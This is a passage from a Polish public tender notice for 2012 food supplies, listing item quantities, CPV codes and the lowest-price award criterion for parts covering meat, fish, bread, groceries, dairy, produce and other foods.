wołowina gulaszowa	kg	5
wołowina zrazowa	kg	5
żeberka wiep	kg	9
żebra wołowe	kg	3
żołądki drobiowe	kg	7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.13.11.10-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie nr 8 - ryby i przetwory konserwowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> filet z morszczuka	kg	10
karp	kg	5
łosoś filet	kg	2
łosoś sałatkowy 100g	szt	10
łosoś sałatkowy 	szt	8
lłosoś wędzony	kg	13
matijas	kg	7
mintaj wędzony	kg	2
morszczuk filet	kg	7
paluszki rybne	kg	10
panga	kg	13
paprykarz 156g	szt	12
pstrąg świe.	kg	12
pstrąg wędzony	kg	7
szprot w pomidorach	szt	30
śledż św. Filet	kg	8
śledź w pomidorach	szt	30
tuńczyk  w sosie wł. 250G	szt	30
tunczyk w oleju 300g	szt	10
węgorz wędzony	kg	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie nr 9 - produkty przemiału ziarna i skrobi - pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> chleb krojony0,6kg	szt	1300
chleb forma 0.5	szt	50
chleb forma 1kg	szt	17
chleb słonecznikowy 0,5 	szt	17
chleb sojowy 0.5	szt	17
chleb razowy 0,5	szt	20
chleb wiejski 1kg	szt	5
ciastka drożdżowe 100g	szt	133
ciasta różne	kg	8
bułki 100g	szt	133
bułki 50g	szt	1733
bułki hamburger	szt	60
rogal 100g	szt	120
bułka tarta	kg	13
bułka tarta 0,5kg	szt	7
pączki 100g	szt	90
ciastka francuskie	szt	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie nr 10 - produkty skrobi - mąka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> kasza manna	kg	8
kasza gryczana 5x100gkg	szt	7
kasza gryczana 1kg	szt	3
kasza jęczm. drobna	kg	3
kasza jęczm. Średnia	kg	8
kasza jęczm. Średnia 5kg	szt	1
kasza pęczak	kg	8
mąka krupczatka	kg	3
mąka pszenna typu 500	kg	20
mąka pszenna typu 450	kg	20
mąka ziemiaczna	kg	10
płatki owsiane	kg	3
płatki kukurydz. 250G	szt	7
platki kukur. 500 g	szt	17
platki kuku.kakaowe 250g	szt	7
platki kukur.kakaowe 500g	szt	17
płatki typu nestle chocapic	szt	27
płatki 500g typu kangus	szt	17
ryż 1kg typu uncle bens	szt	7
ryż w woreczkach 0,5kg	szt	12
ryż 1kg	kg	13.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie nr 11 - różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> baton   	szt	50
baton typu milki way lub równoważny	szt	50
bato 	szt	70
baton typu snikers lub równoważny	szt	100
barszcz czerwony 220ml	szt	19
bialy barszcz	szt	18
budyń	szt	30
chrupki kukurydziane	szt	30
ciastka w polewie	kg	4
ciastka kruche	kg	4
ciastka typy pierniki	kg	4
ciastka typu wafelki	kg	4
Ciastka-rolada  300g	szt	7
cukier	kg	110
cukier puder  0,5 kg	szt	3
cukier waniliowy	szt	20
cukier kostka	kg	3
cukierki czekoladowe	kg	4
cukierki typu krówki	kg	4
cukierki typu szklaki	kg	4
cukierki owocowe	kg	4
cynamon 0,20g	szt	8
czekolada z orzechami	szt	30
czekolada nadziewana	szt	60
czekolada pełnomleczna	szt	60
czipsy	szt	60
draże mleczne	szt	63
drożdże 100g	szt	10
galaretka owocowa	szt	27
gofry	szt	60
herbata expres 100 szt	szt	3
herbata expres 50 szt	szt	13
herbata expr. Mietowa 20szt	szt	3
hebata expres owocowa 25szt	szt	3
herbata granulowana 100g	szt	5
herbata owoc.rozpusz gran.	szt	3
herbata typu lipton100szt  lub równoważna	szt	4
herbata typu lipton 50 szt  lub równoważna	szt	3
herbata zielona expre25szt	szt	7
jarzynka 200g	szt	7
jarzynka 1kg	szt	3
Jarzynka 0,5 kg	szt	4
Kawa zboż-expr. typu anatol  lub równoważna	szt	7
kawa rozpuszczalna zboż	szt	7
kawa rozpusz. typu neskaffe 200g  lub równoważna	szt	3
kawa rozpuszcz. Typu neskaffe 100g  lub równoważna	szt	5
kawa rozpuszczalna 100g	szt	5
kawa rozpuszczalna 200g	szt	3
kawa typy capucino  lub równoważna	szt	7
kawa naturalna mielona 250g	szt	7
kawa naturalna mielona 500ml	szt	3
kawa typu premium 250g  lub równoważna	szt	7
kawa typu premium 500g  lub równoważna	szt	4
kakao typu puchatek	szt	27
keczup 500g 	szt	17
keczup pikantny 0.5 	szt	8
Keczup 1 l	szt	3
keczup wiadro	szt	2
kisiel	szt	22
kisiel expr typu słodka chwila  lub równoważny	szt	60
kminek 20g	szt	8
kotlety sojowe  0,35	szt	7
kotlety sojowe 0,5	szt	3
krem czekoladowy 200g	szt	67
krem czekoladowy 400g	szt	27
krem czekolad.typu nutella  lub równoważny	szt	33
krem czek.250gszt  	szt	40
kurkuma	szt	8
kwasek cytrynowy	szt	27
kwasek cytrynowy 0,5kg	szt	1
liść laurowy 12g	szt	8
liść laurowy 500g	szt	3
lizak typu chupa-chups  lub równoważny	szt	60
lizak 	szt	60
lizak typu serduszko	szt	60
Łazanki 0.5	szt	13
magi w plynie 1 l	szt	5
mak -puszka 500g	szt	5
makaron nitki  0.5 kg	szt	15
makaron gniazda 1kg 	szt	15
makar. gniaz. 0,5kg 	szt	15
makaron kokardy 3 kg	szt	5
makaron rurki 1 kg	szt	5
makaron paczka  typu 	szt	7
makaron świderki 1kg	szt	7
makaron spagetti 0,5kg	szt	20
makaron zacierka	szt	24
majeranek 20g	szt	13
majeranek 150g	szt	3
majeranek 500g	szt	3
majonez sałatkowy 350g	szt	12
majonez  sałatkowy 700g	szt	14
majonez sałatkowy 900g	szt	16
majonez sałatkowy 3kg 	szt	5
majonez majonez  5kg	szt	5
miód sztuczny 200g	szt	15
miód sztuczny  5kg	szt	2
Miód naturalny 0,9 l	szt	3
musztarda 	szt	15
musztrda tuba 0.5 l	szt	7
musztarda 1l	szt	4
Ocet 10%	szt	16
paluszki solone 0,400g	szt	60
paluszki	szt	60
paluszki z sezamem	szt	60
papryka mielona 20g	szt	17
papryka mielona słodka1kg	szt	4
papryka miel. Pikantna 1kg	szt	2
paprykarz szczeciń 131g	szt	27
paprykarz szczcz. 300G	szt	13
pasztet wielkopolski 131g lub równoważny	szt	32
pasztet wielk.z pomid. 131G  lub równoważny	szt	17
pasztet wielk. Z koper. 131G lub równoważny	szt	17
pieprz mielony 20g	szt	17
pieprz mielony 1000g	szt	2
pieprz w ziarnkach 20g	szt	8
pieprz w ziarnkach 1kg	szt	3
pieprz ziolowy 20g	szt	8
pieprz ziolowy 1 kg	szt	2
polewa do lodów 1 l	szt	5
polewa do lodów 250g	szt	3
proszek do pieczenia	szt	20
przyprawa gyros 30	szt	13
przyprawa gyros 0,700g	szt	2
przyprawa do bigosu 0,3	szt	10
przyprawa do grilla 20g	szt	17
przyprawa do grilla 1kg	szt	2
przyprawa do kurczaka 1 kg	szt	4
przyprawa do kurczaka	szt	33
przyprwa do ryb 30g	szt	13
przyprawa do ryb 600g	szt	3
puure ziemn. z boczkiem	szt	30
rosól drobiowy 1 kg	szt	20
rosół drobiowy kost.	szt	7
soda spożywcza	szt	8
sos typy bolones 0,500l	szt	13
sos chili 1l	szt	3
sos czosnkowy 1 l	szt	5
sos czosnkowy 250ml	szt	7
sos do deserów 1 l	szt	5
sos do hamburgerow 1 l	szt	3
sos do spagetti	szt	20
sos bolone 1 kg	szt	2
sos neapoli 1kg	szt	2
sos mix koper-zioł, włoski itp 0,700	szt	3
sos salatkowy mix 700g	szt	3
sos słodko-kwaśny	szt	15
sos sojowy 1l	szt	4
sos sojowo-grzybowy 	szt	4
sól	kg	50
sól konserwowa	kg	17
Wafle-miseczki 	szt	150
wafelek duży(wafel z kremem typu murzynek)	szt	60
wafelek mały(wafel z kremem typu murzynek)	szt	60
wafelek w polewie	szt	70
wafelek typu grześ w polewie	opk	2
wafelek b/polewy typu grzesiek  lub równoważny	szt	70
wafelek b/polewy typu grzesiek  lub równoważny	opk	2
warzywko 200g	szt	10
warzywko 500g	szt	3
Warzywko 1 kg	szt	3
wiórki kokosowe 0,25	szt	3
Zasmazka 1 kg	szt	3
ziele angielskie	szt	8
ziele angielskie 600g 	szt	3
zupki typu chińska(ostra,łagodna rosołowa itp.)	szt	80
zupki typu chiska(rosołowa-ostra/lagodna,krabowa itp.)	szt	50
zupki typu chińska(pomidorowa, barszcz,itp)	szt	50
zelatyna 50g	szt	8
Żelatyna 1 kg	szt	3
żurek w butelce	szt	10
zurek w proszku	szt	8.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie nr 12- oleje i tłuszcze roślinne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> margaryna z masłem lub równoważny	szt	280
margaryna typu  0,5 kg  lub równoważna	szt	120
masło roślinne 200g	szt	25
oliwa z oliwek 1 l	szt	12
olej 1l	szt	110
olej 3l	szt	10
olej 5l	szt	15
smalec	kg	4
smalec 200g	szt	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.43.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadanie nr 13 - produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> deser	szt	120
deser typu monte  lub równoważny	szt	120
jogurt pitny	szt	135
jogurt typu fantazja  lub równoważny	szt	135
jogurt typu gratka lub równoważny	szt	135
jogurt typu jogutek lub równoważny	szt	135
jogurt typu serduszko  lub równoważny	szt	135
lody 100g	szt	65
Lody-rolada 850g	szt	12
lody 1000g	szt	10
kefir 0,5l	szt	90
masło śmietank. 200G	szt	167
maślanka owocowa 0,5	szt	120
Mleko 2% 1l	szt	20
Mleko 3,2% 1l	szt	167
ser feta	szt	13
serek grani	szt	120
serek grani ze szczypiorem	szt	120
serek homogenizowany	szt	90
serek homogenizowany owoc.	szt	120
serek kanapk. Twarożk. 150g	szt	60
serek twaroż. Typu almette  lub równoważny	szt	67
ser twarogowy 200g	szt	27
ser twarogowy półtusty	kg	5
set topiony typu hochland	szt	40
ser topiony -kielbaski	szt	27
ser topiony typu laktima	szt	20
ser top. krążek typu hochl.	szt	50
ser topiony zegar 80g	szt	67
ser salami	kg	8
ser wędzony	kg	8
ser żółty typu edamski	kg	3
ser żółty typu królewski	kg	3
ser żółty typu morski	kg	3
ser żółty typu szwajcar	kg	28
śmietanka jednoraz. 10Szt	szt	300
śmietana w spray 0,5	szt	15
Śmietana 18% 0,5 l	szt	16
Śmietana 18% 1l	szt	8
Śmietana 30%  0,5 l	szt	16
Smietana 30% 1l	szt	16.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zadanie nr 14 - napoje.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> napoje gazowane 1,5 l	szt	100
napoje niegazowane 1,5 l	szt	50
napój gazowany 2l	szt	17
napój n/g 2 l	szt	17
napój typu frutti  lub równoważny	szt	90
napój typu tymbark  lub równoważny	szt	90
mnapój energet. typu tiger  lub równoważny	szt	117
Woda mineral. 0,5 gaz	szt	117
Woda mineralna 0,5 n/g	szt	117
Woda mineralna n/g 0,5 l typu szt	117
woda mineral. G 0,5 l 	szt	120
woda mineral. n/g 1,5 l 	szt	43
Woda mineralna g 1,5 l 	szt	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.90.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Zadanie nr 15 - owoce świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ananas owoc	szt	10
arbuz	kg	50
banany	kg	50
brzoskwinie	kg	30
cytryny	kg	10
gruszki	kg	10
jabłka	kg	50
kiwi	kg	10
nektaryny	kg	25
maliny	kg	3
mandarynki	kg	33
pomarancza	kg	20
pomarańcza siatka	kg	10
rabarbar	kg	17
truskawki	kg	12
winogrona jasne	kg	17
winogrona ciemne	kg	17
wisnie	kg	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Zadanie nr 16 - owoce przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ananas konserowany puszka	szt.	20
brzoskwinia konserwowa puszka	szt	16
Dżem owocowy 7 kg	szt	2
Dżem  słoik	szt	50
kompot truskawkowy 0,9 l	szt	9
marmolada owocowa 7kg	szt	1
sok owocowy 2l karton	szt	17
sok owocowy 1l karton	szt	10
syrop owocowy 6,5l 	szt	7
syrop owocowy 1l 	szt	8
rodzynki suszone 100g	szt	10
rodzynki suszone 0.5 kg	szt	3
śliwki suszone 250g	szt	5
żurawina	szt	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Zadanie nr 17 - warzywa świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> burak młody	kg	8
burak	kg	50
brokuł	szt	3
cebula	kg	150
cebula młoda	kg	33
cebula czerwona 	kg	3
czosnek	szt	17
fasola jaś 0,5kg	szt	7
fasola drobna 5kg	szt	1
fasola drobna 0,5 kg	szt	3
fasola jaś	kg	3
fasola szparagowa	kg	7
groch cały	kg	3
groch łuska	szt	8
kapusta czerwona	kg	8
kapusta młoda 	szt	17
kapusta 	kg	17
kapusta pekińska	szt	33
kapusta włoska	szt 	7
kalafior	szt	7
koper	szt	50
marchew młoda	kg	10
marchew myta	kg	50
ogórek świeży	kg	40
papryka świeża	kg	13
pietruszka korzeń	kg	40
pomidor	kg	50
por 	kg	40
rzodkiewka pęczki	szt	50
sałata	szt	27
sałata dekoracyjna	szt	33
sałata lodowa	szt	13
seler	kg	27
szczypiorek	szt	27
szparagi	szt	7
zielenina natka	szt	50
ziemniaki młode	kg	67
ziemniaki 	kg	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Zadanie nr 18 - warzywa przetworzone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> chrzan tarty słoik	szt.	7
chrzan z żurawiną	szt	7
cebulka konserwowa 300g	szt	10
fasolka czerwona konserwowa	szt	10
groszek konserwowy 400g	szt	27
groszek z marchewką 0,9l	szt	8
kapusta kiszona  5kg	szt	7
koncentrat pomidorowy 0,9l	szt	10
koncentrat pomidorowy 1l	szt	7
kukurydza konserwowa	szt	10
oliwki zielone 200ml	szt	10
oliwki czarne 	szt	10
ogórki kiszone 3kg	szt	5
ogórki małosolne	kg	20
ogórki konserwowe 0,9l	szt	20
papryka konserwowa 0,9l	szt	15
pieczarka	kg	15
pieczarka konserwowa 0,9l	szt	12
seler w słoiku 0,250	szt	8
szczaw konserwowy 0,9l	szt	8.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Zadanie nr 19- mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> brukselka mroż. 0,5 kg	szt	3
brukselka mroż. 2,5 kg	szt	5
brokuły mroż. 2,5 kg	szt	5
frytki 450g	szt	12
Frytki 1,5 kg	szt	5
Frytki 2 kg	szt	7
groszek mrozony	kg	5
groszek mrozony 2,5 kg	szt	2
kalafior mroz 2,5 kg	szt	2
kalafior mroż	kg	5
marchew kostka mroż 	kg	5
marchew z groszkiem 2,5 kg	szt	2
marchew z groszkiem mroż	kg	8
pizza 500g	szt	33
szpinak 1kg	szt	10
truskawki mrozone	kg	5
warzywa na patelnię	kg	7
warzywa na pat.chinskie	kg	3
zapiekanka 200g	szt	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Zadanie nr 20 - jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> jaja klasy M o gramaturze 53-63 gr	szt	666.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Zadanie nr 21 - mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> boczek świeży	kg	3
boczek wędzony gotowany 	kg	7
boczek wędzony surowy	kg	3
baleron wieprzowy	kg	7
ćwiartki tylne drobiowe	kg	20
filet z piersi kurczaka	kg	40
filet królewski z indyka	kg	13
kflaki wieprzowe	kg	7
flaki wołowe 1 kg	szt	7
golonka wieprz b/k	kg	10
kabanosy leśne  lub równoważne	kg	10
karkówka wieprz b/k 	kg	50
kiełbasa biała parzona	kg	50
kiełbasa biała  surowa	kg	40
kiełbasa śląska  lub równoważna	kg	20
kiełbasa toruńska  lub równoważna	kg	40
kiełbasa typu mysliwska  lub równoważna	kg	13
kiełbasa typu ogniskowa  lub równoważna	kg	17
kiełbasa szynkowa	kg	40
kiełbasa z weka  lub równoważna	kg	7
kiełbasa typu krakowska  lub równoważna	kg	8
kiełbasa typu krakowska parzona  lub równoważne	kg	8
kiełbasa typu zywiecka lub równoważna	kg	8
korpusy drobiowe(grzbiety)	kg	33
kości wieprzowe	kg	30
kurczak świe.	kg	15
królewiecka  lub równoważna	kg	15
łopatka b/k	kg	50
metka cebulowa 200g	szt	40
metka łososiowa 	kg	7
metka inna typu wiejska  lub równoważna	kg	5
mielonka konserwowa	kg	13
mięso gulaszowe	kg	10
ogonówka 	kg	20
ozory wieprzowe	kg	7
parówka w folii	kg	17
parówka wiedenska  lub równoważna	kg	17
pasztetowa  domowa	kg	7
pasztet drobiowy	kg	7
polędwica drobiowa	kg	7
polędwica miodowa  lub równoważne	kg	7
polędwica sopocka lub równoważne	kg	10
polędwica szkolna  lub równoważna	kg	7
polędwica wieprz.(wędlina)	kg	7
przysmak śniadaniowy 130g	szt	10
salami rodzinne	kg	5
serdelki	kg	10
schab wiep b/k	kg	20
szynka mielona	kg	3
szynka konserwowa 	kg	5
szynka wiep b/k	kg	15
szynka typu królewiecka mielo  lub równoważna	kg	2
tyrolska  lub równoważna	kg	15
turystyczna  lub równoważna	szt	15
udka	kg	50
wątroba drobiowa	kg	7
wątroba wieprzowa	kg	7
wołowina zrazowa	kg	10
żeberka wiep	kg	9.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.10-5, 15.11.90.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Zadanie nr 22 - ryby i przetwory konserwowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> filet z morszczuka	kg	7
karp	kg	2
łosoś filet	kg	5
lłosoś wędzony	kg	7
matijas	kg	3
mintaj wędzony	kg	2
paluszki rybne	kg	10
panga	kg	7
paprykarz 156g	szt	7
pstrąg świe.	kg	3
pstrąg wędzony	kg	7
szprot w pomidorach	szt	13
śledź w pomidorach	szt	13
tuńczyk  w sosie wł. 250G	szt	10
tunczyk w oleju 300g	szt	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Zadanie nr 23 - produkty przemiału ziarna i skrobi - pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> chleb krojony0,6kg	szt	1100
chleb forma 0.5	szt	30
chleb razowy 0,5	szt	20
 drożdżówka 100g	szt	65
ciasta różne	kg	5
bułki 50g	szt	1000
rogal 100g	szt	50
bułka tarta	kg	10
pączki 100g	szt	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Zadanie nr 24 - produkty skrobi - mąka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> kasza manna 	kg.	3
kasza gryczana 1kg	szt	3
kasza jęczm. Średnia	kg	7
mąka pszenna typu 500	kg	13
mąka pszenna typu 450	kg	13
mąka ziemiaczna	kg	7
platki kukur. 500 g	szt	18
platki kukur.kakaowe 500g	szt	18
ryż 1kg 	szt	7
ryż 1kg	kg	13.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.60.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Zadanie nr 25 - różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> baton	szt.	40
baton czekoladowy w opakowaniu	szt	40
baton nadziewany	szt	40
barszcz czerwony 220ml-koncentrat	szt	10
bialy barszcz 60g	szt	7
budyń	szt	17
chrupki kukurydziane	szt	17
ciastka w polewie	kg	3
ciastka kruche	kg	17
ciastka typy pierniki	kg	7
ciastka typu wafelki	kg	17
cukier	kg	170
cukier puder  0,5 kg	szt	3
cukier waniliowy	szt	11
cukierki czekoladowe	kg	20
cukierki krówki	kg	3
cukierki owocowe	kg	13
cynamon 0,20g	szt	7
czekolada pełnomleczna	szt	50
czipsy	szt	50
galaretka owocowa	szt	17
gofry	szt	33
herbata expres 100 szt	szt	43
herbata expres 50 szt	szt	7
hebata expres owocowa 25szt	szt	15
herbata 100szt  lub równoważna	szt	4
jarzynka 200g	szt	8
kawa rozpuszczalna zboż	szt	7
kawa rozpuszczalna 200g  lub równoważna	szt	12
kawa naturalna mielona 500ml	szt	97
kawa  500g  lub równoważna	szt	3
kakao  rozpuszczalne 500g	szt	13
keczup 500g 	szt	10
keczup pikantny 0.5 	szt	5
kisiel	szt	20
kminek 20g	szt	3
krem czekoladowy 200g	szt	50
krem czekoladowy 400g	szt	13
kwasek cytrynowy	szt	27
liść laurowy 12g	szt	5
lizak serduszko	szt	100
magi w plynie 1 l	szt	3
makaron nitki  0.5 kg	szt	13
makaron gniazda 1kg 	szt	13
makaron paczka  1kg	szt	7
makaron świderki 1kg	szt	7
makaron spagetti 0,5kg	szt	17
majeranek 20g	szt	7
majonez  sałatkowy 700g	szt	13
majonez sałatkowy 900g	szt	15
musztarda 	szt	10
musztrda tuba 0.5 l	szt	3
Ocet 10%	szt	7
paluszki solone 0,400g	szt	150
paluszki z sezamem	szt	160
papryka mielona 20g	szt	10
papryka mielona słodka1kg	szt	3
pasztet wielkopolski 131g lub równoważny	szt	13
pasztet wielk.z pomid. 131G  lub równoważny	szt	13
pieprz mielony 20g	szt	10
pieprz ziolowy 20g	szt	3
polewa do lodów 1 l	szt	5
polewa do lodów 250g	szt	10
proszek do pieczenia	szt	13
przyprawa gyros 30	szt	7
przyprawa do kurczaka 1 kg	szt	3
przyprawa do kurczaka	szt	3
rosół drobiowy kost.	szt	17
sos typy bolones 0,500l	szt	10
sos do deserów 1 l	szt	3
sos do spagetti	szt	13
sos neapoli 1kg	szt	3
sos słodko-kwaśny	szt	20
sól	kg	33
wafelek duży(wafel z kremem)	szt	170
wafelek w polewie	szt	150
wafelek grześ w polewie	opk	102
wafelek b/polewy 	szt	50
vegeta 200g	szt	10
ziele angielskie	szt	5
zupki chińska (ostra,łagodna rosołowa itp.)	szt	67
zupki chiska(rosołowa-ostra/lagodna,krabowa itp.)	szt	33
zelatyna 50g	szt	3
żurek w butelce	szt	10
zurek w proszku	szt	8.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Zadanie nr 26- oleje i tłuszcze roślinne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> margaryna 0,5 kg  lub równoważna	szt.	83
margaryna 0,5 kg  lub równoważna	szt	33
masło roślinne 200g	szt	8
olej 1l	szt	33
olej 5l	szt	5
smalec 200g	szt	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.40.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Zadanie nr 27 - produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> desrer monte lub równoważny	szt.	50
jogurt pitny	szt	50
jogurt  150g	szt	50
jogurt  150g	szt	50
lody 100g	szt	29
Lody-rolada 850g	szt	20
lody 1000g	szt	21
masło śmietank. 200G	szt	100
Mleko 2% 1l	szt	20
Mleko 3,2% 1l	szt	400
